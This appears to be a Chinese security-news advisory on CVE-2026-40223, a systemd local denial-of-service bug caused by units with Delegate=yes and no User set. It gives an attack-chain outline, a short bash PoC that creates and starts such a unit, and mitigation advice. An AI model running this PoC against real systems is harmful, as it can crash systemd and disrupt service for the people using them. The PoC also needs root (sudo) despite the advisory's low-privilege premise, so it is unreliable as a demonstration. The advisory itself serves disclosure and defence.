CVE-2026-40223 CVSS 4.7 中危

CVE-2026-40223 systemd本地拒绝服务漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40223

漏洞类型

拒绝服务

CVSS评分

4.7 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

systemd

漏洞概述

Systemd 258至260之前的版本中存在安全漏洞。当系统中配置了Delegate=yes且User未设置的unit并处于运行状态时，本地低权限用户可以触发断言失败。该漏洞可能导致systemd服务崩溃，从而造成系统拒绝服务，影响可用性。

技术细节

该漏洞源于systemd处理特定unit配置时的逻辑错误。攻击者需拥有本地低权限账户（PR:L）。在存在Delegate=yes且User未设置的特定unit环境下，攻击者通过交互可触发systemd内部的断言机制。断言失败将导致systemd进程异常终止，引发系统崩溃或服务中断。虽然利用难度较高（AC:H），但在满足配置条件时，可成功实施本地DoS攻击。

攻击链分析

STEP 1

1. 获取本地访问

攻击者获得目标系统的本地低权限用户访问权限。

STEP 2

2. 识别配置环境

确认系统中存在或能够创建配置了Delegate=yes且User未设置的systemd unit。

STEP 3

3. 触发断言

启动或与该unit交互，触发systemd内部的assert断言失败。

STEP 4

4. 系统崩溃

systemd进程终止，导致系统服务不可用（拒绝服务）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-40223: systemd assertion failure PoC

SERVICE_NAME="poc-cve-2026-40223.service"
SERVICE_FILE="/etc/systemd/system/$SERVICE_NAME"

# Create a unit file with Delegate=yes and no User set
echo "[Unit]" | sudo tee $SERVICE_FILE > /dev/null
echo "Description=PoC for CVE-2026-40223" | sudo tee -a $SERVICE_FILE > /dev/null
echo "[Service]" | sudo tee -a $SERVICE_FILE > /dev/null
echo "Type=simple" | sudo tee -a $SERVICE_FILE > /dev/null
echo "Delegate=yes" | sudo tee -a $SERVICE_FILE > /dev/null
echo "ExecStart=/usr/bin/sleep 300" | sudo tee -a $SERVICE_FILE > /dev/null

# Reload systemd and start the service to trigger the bug
sudo systemctl daemon-reload
sudo systemctl start $SERVICE_NAME

echo "Service started. If vulnerable, systemd may crash or trigger an assert."

影响范围

systemd 258

systemd 259

防御指南

临时缓解措施

管理员应立即检查系统中的所有systemd unit文件，确保没有在未设置User的情况下启用Delegate=yes。对于此类配置，应明确指定User或移除Delegate选项。此外，限制普通用户对systemd配置目录的写入权限可降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表